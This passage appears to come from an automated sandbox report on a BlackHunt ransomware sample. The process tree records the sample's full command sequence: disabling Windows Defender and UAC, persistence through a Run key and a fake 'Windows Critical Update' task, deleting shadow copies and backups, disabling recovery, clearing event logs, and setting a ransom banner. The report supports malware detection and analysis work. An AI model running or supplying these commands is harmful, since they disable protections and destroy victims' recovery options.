4100 wrote to memory of 4632 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 128 PID 4100 wrote to memory of 4632 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 128 PID 4100 wrote to memory of 4548 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 127 PID 4100 wrote to memory of 4548 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 127 PID 4100 wrote to memory of 4896 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 130 PID 4100 wrote to memory of 4896 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 130 PID 4100 wrote to memory of 2776 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 132 PID 4100 wrote to memory of 2776 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 132 PID 4100 wrote to memory of 3780 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 133 PID 4100 wrote to memory of 3780 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 133 PID 4100 wrote to memory of 2124 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 137 PID 4100 wrote to memory of 2124 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 137 PID 400 wrote to memory of 384 400 cmd.exe 136 PID 400 wrote to memory of 384 400 cmd.exe 136 PID 4100 wrote to memory of 3364 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 140 PID 4100 wrote to memory of 3364 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 140 PID 552 wrote to memory of 428 552 cmd.exe 142 PID 552 wrote to memory of 428 552 cmd.exe 142 PID 4100 wrote to memory of 1492 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 144 PID 4100 wrote to memory of 1492 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 144 PID 4100 wrote to memory of 3000 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 146 PID 4100 wrote to memory of 3000 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 146 PID 4100 wrote to memory of 3828 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 150 PID 4100 wrote to memory of 3828 4100 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe 150 PID 2812 wrote to memory of 3292 2812 cmd.exe 148 PID 2812 wrote to memory of 3292 2812 cmd.exe 148 PID 1952 wrote to memory of 1340 1952 cmd.exe 152 PID 1952 wrote to memory of 1340 1952 cmd.exe 152 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe"C:\Users\Admin\AppData\Local\Temp\8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4100 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:116 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:1088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:3292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:4504
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:992
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:5904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:392
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:5208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1636
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:8468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3636
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:9764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1068
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:5324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:5272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:928
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:3324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4548
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:9068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4632
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:6192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4896
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:6748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2776
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:6960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3780
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:6936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2124
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:6944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:3364
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:6980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1492
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:9768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:3000
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:8352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3828
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1152
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Modifies registry class
PID:1088
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:8300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4472
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:7920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2260
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe" /F2⤵PID:544
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe" /F3⤵
- Creates scheduled task(s)
PID:7628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2740
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:7824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:4600
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2276
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:6152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:3260
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:6756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5196
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:5188
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5236
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:7976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5220
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:7424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3428
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5340
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:7916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5332
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:16488
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:16364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:16456
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:16348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:16484
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:16312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:10012
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:17040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:16296
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:17052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:16280
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:17384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:11352
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:17068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:16236
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:17272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:16216
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:10792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:7136
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:17360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:16536
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:17240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:16516
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:17348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:16660
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:17228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:16636
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:17200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:16840
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:14224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3260
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:17320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:6720
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:14120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:16972
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:14200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:17104 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:14252
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\8e178c615e1408cf7d9c4be03131b0ebb116102972e300585cedb87caf874268.exe"2⤵PID:17172
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:17204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:12108
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:8792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:16904
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:14300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:16916
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:14188
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7112
-
